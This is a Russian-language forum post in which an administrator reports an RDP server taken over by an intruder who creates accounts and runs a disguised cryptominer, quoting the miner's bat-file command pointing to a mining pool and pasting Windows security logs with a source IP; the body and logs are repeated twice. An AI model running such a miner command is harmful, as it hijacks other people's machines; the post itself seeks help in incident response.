Crumb
07-12-2016, 20:46
Имеется сервер rdp настроенный на основе windows 7. Последние пару дней начал svchost.exe грузить проц на 100%. Нашёл у себя папу APIX в ней этот файл и bat файл: svchost -l zec.coinmine.pl:7007 -u bever2.all -p 1.
В общем кто-то подключается, создает пользователя и запускает эту хрень. Как найти кто и прекратить всё это? Удаление папки и пользователя не спасло. Первого созданного пользователя звали buh.
Вот логи:
Изменена учетная запись пользователя.
Субъект:
Идентификатор безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Идентификатор входа: 0x3e7
Целевая учетная запись:
Идентификатор безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Измененные атрибуты:
Имя учетной записи SAM: Lena
Отображаемое имя: Lena
Основное имя пользователя: -
Домашний каталог: <значение не задано>
Домашний диск: <значение не задано>
Путь к сценарию: <значение не задано>
Путь к профилю: <значение не задано>
Рабочие станции пользователя: <значение не задано>
Последний пароль задан: 07.12.2016 16:36:02
Срок действия учетной записи истекает: <никогда>
Идентификатор основной группы: 513
Разрешено делегировать: -
Старое значение UAC: 0x210
Новое значение UAC: 0x210
Управление учетной записью пользователя: -
Параметры пользователя: -
Журнал SID: -
Часы входа: Все
Дополнительные сведения:
Привилегии: -
Выполнена попытка сброса пароля учетной записи.
Субъект:
Идентификатор безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Идентификатор входа: 0x3e7
Целевая учетная запись:
Идентификатор безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Вход с учетной записью выполнен успешно.
Субъект:
ИД безопасности: NULL SID
Имя учетной записи: -
Домен учетной записи: -
Код входа: 0x0
Тип входа: 3
Новый вход:
ИД безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Код входа: 0x7fccf0d
GUID входа: {00000000-0000-0000-0000-000000000000}
Сведения о процессе:
Идентификатор процесса: 0x0
Имя процесса: -
Сведения о сети:
Имя рабочей станции: WIN-Q5JN8U2O23P
Сетевой адрес источника: -
Порт источника: -
Сведения о проверке подлинности:
Процесс входа: NtLmSsp
Пакет проверки подлинности: NTLM
Промежуточные службы: -
Имя пакета (только NTLM): NTLM V2
Длина ключа: 128
Выполнена попытка входа в систему с явным указанием учетных данных.
Субъект:
ИД безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Код входа: 0x3e7
GUID входа: {00000000-0000-0000-0000-000000000000}
Были использованы учетные данные следующей учетной записи:
Имя учетной записи: Lena
Домен учетной записи: Server_1c
GUID входа: {00000000-0000-0000-0000-000000000000}
Целевой сервер:
Имя целевого сервера: localhost
Дополнительные сведения: localhost
Сведения о процессе:
Идентификатор процесса: 0x2c24
Имя процесса: C:\Windows\System32\winlogon.exe
Сведения о сети:
Сетевой адрес: 89.184.82.231
Порт: 61870
Вход с учетной записью выполнен успешно.
Субъект:
ИД безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Код входа: 0x3e7
Тип входа: 10
Новый вход:
ИД безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Код входа: 0x7fcf2a7
GUID входа: {00000000-0000-0000-0000-000000000000}
Сведения о процессе:
Идентификатор процесса: 0x2c24
Имя процесса: C:\Windows\System32\winlogon.exe
Сведения о сети:
Имя рабочей станции: SERVER_1C
Сетевой адрес источника: 89.184.82.231
Порт источника: 61870
Сведения о проверке подлинности:
Процесс входа: User32
Пакет проверки подлинности: Negotiate
Промежуточные службы: -
Имя пакета (только NTLM): -
Длина ключа: 0
Изменена учетная запись пользователя.
Субъект:
Идентификатор безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Идентификатор входа: 0x3e7
Целевая учетная запись:
Идентификатор безопасности: Server_1c\ Администратор
Имя учетной записи: Администратор
Домен учетной записи: Server_1c
Измененные атрибуты:
Имя учетной записи SAM: Администратор
Отображаемое имя: <значение не задано>
Основное имя пользователя: -
Домашний каталог: <значение не задано>
Домашний диск: <значение не задано>
Путь к сценарию: <значение не задано>
Путь к профилю: <значение не задано>
Рабочие станции пользователя: <значение не задано>
Последний пароль задан: 07.12.2016 16:36:21
Срок действия учетной записи истекает: <никогда>
Идентификатор основной группы: 513
Разрешено делегировать: -
Старое значение UAC: 0x211
Новое значение UAC: 0x211
Управление учетной записью пользователя: -
Параметры пользователя: -
Журнал SID: -
Часы входа: Все
Дополнительные сведения:
Привилегии: -
В общем кто-то подключается, создает пользователя и запускает эту хрень. Как найти кто и прекратить всё это? Удаление папки и пользователя не спасло. Первого созданного пользователя звали buh.
Вот логи:
Изменена учетная запись пользователя.
Субъект:
Идентификатор безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Идентификатор входа: 0x3e7
Целевая учетная запись:
Идентификатор безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Измененные атрибуты:
Имя учетной записи SAM: Lena
Отображаемое имя: Lena
Основное имя пользователя: -
Домашний каталог: <значение не задано>
Домашний диск: <значение не задано>
Путь к сценарию: <значение не задано>
Путь к профилю: <значение не задано>
Рабочие станции пользователя: <значение не задано>
Последний пароль задан: 07.12.2016 16:36:02
Срок действия учетной записи истекает: <никогда>
Идентификатор основной группы: 513
Разрешено делегировать: -
Старое значение UAC: 0x210
Новое значение UAC: 0x210
Управление учетной записью пользователя: -
Параметры пользователя: -
Журнал SID: -
Часы входа: Все
Дополнительные сведения:
Привилегии: -
Выполнена попытка сброса пароля учетной записи.
Субъект:
Идентификатор безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Идентификатор входа: 0x3e7
Целевая учетная запись:
Идентификатор безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Вход с учетной записью выполнен успешно.
Субъект:
ИД безопасности: NULL SID
Имя учетной записи: -
Домен учетной записи: -
Код входа: 0x0
Тип входа: 3
Новый вход:
ИД безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Код входа: 0x7fccf0d
GUID входа: {00000000-0000-0000-0000-000000000000}
Сведения о процессе:
Идентификатор процесса: 0x0
Имя процесса: -
Сведения о сети:
Имя рабочей станции: WIN-Q5JN8U2O23P
Сетевой адрес источника: -
Порт источника: -
Сведения о проверке подлинности:
Процесс входа: NtLmSsp
Пакет проверки подлинности: NTLM
Промежуточные службы: -
Имя пакета (только NTLM): NTLM V2
Длина ключа: 128
Выполнена попытка входа в систему с явным указанием учетных данных.
Субъект:
ИД безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Код входа: 0x3e7
GUID входа: {00000000-0000-0000-0000-000000000000}
Были использованы учетные данные следующей учетной записи:
Имя учетной записи: Lena
Домен учетной записи: Server_1c
GUID входа: {00000000-0000-0000-0000-000000000000}
Целевой сервер:
Имя целевого сервера: localhost
Дополнительные сведения: localhost
Сведения о процессе:
Идентификатор процесса: 0x2c24
Имя процесса: C:\Windows\System32\winlogon.exe
Сведения о сети:
Сетевой адрес: 89.184.82.231
Порт: 61870
Вход с учетной записью выполнен успешно.
Субъект:
ИД безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Код входа: 0x3e7
Тип входа: 10
Новый вход:
ИД безопасности: Server_1c\Lena
Имя учетной записи: Lena
Домен учетной записи: Server_1c
Код входа: 0x7fcf2a7
GUID входа: {00000000-0000-0000-0000-000000000000}
Сведения о процессе:
Идентификатор процесса: 0x2c24
Имя процесса: C:\Windows\System32\winlogon.exe
Сведения о сети:
Имя рабочей станции: SERVER_1C
Сетевой адрес источника: 89.184.82.231
Порт источника: 61870
Сведения о проверке подлинности:
Процесс входа: User32
Пакет проверки подлинности: Negotiate
Промежуточные службы: -
Имя пакета (только NTLM): -
Длина ключа: 0
Изменена учетная запись пользователя.
Субъект:
Идентификатор безопасности: система
Имя учетной записи: SERVER_1C$
Домен учетной записи: WORKGROUP
Идентификатор входа: 0x3e7
Целевая учетная запись:
Идентификатор безопасности: Server_1c\ Администратор
Имя учетной записи: Администратор
Домен учетной записи: Server_1c
Измененные атрибуты:
Имя учетной записи SAM: Администратор
Отображаемое имя: <значение не задано>
Основное имя пользователя: -
Домашний каталог: <значение не задано>
Домашний диск: <значение не задано>
Путь к сценарию: <значение не задано>
Путь к профилю: <значение не задано>
Рабочие станции пользователя: <значение не задано>
Последний пароль задан: 07.12.2016 16:36:21
Срок действия учетной записи истекает: <никогда>
Идентификатор основной группы: 513
Разрешено делегировать: -
Старое значение UAC: 0x211
Новое значение UAC: 0x211
Управление учетной записью пользователя: -
Параметры пользователя: -
Журнал SID: -
Часы входа: Все
Дополнительные сведения:
Привилегии: -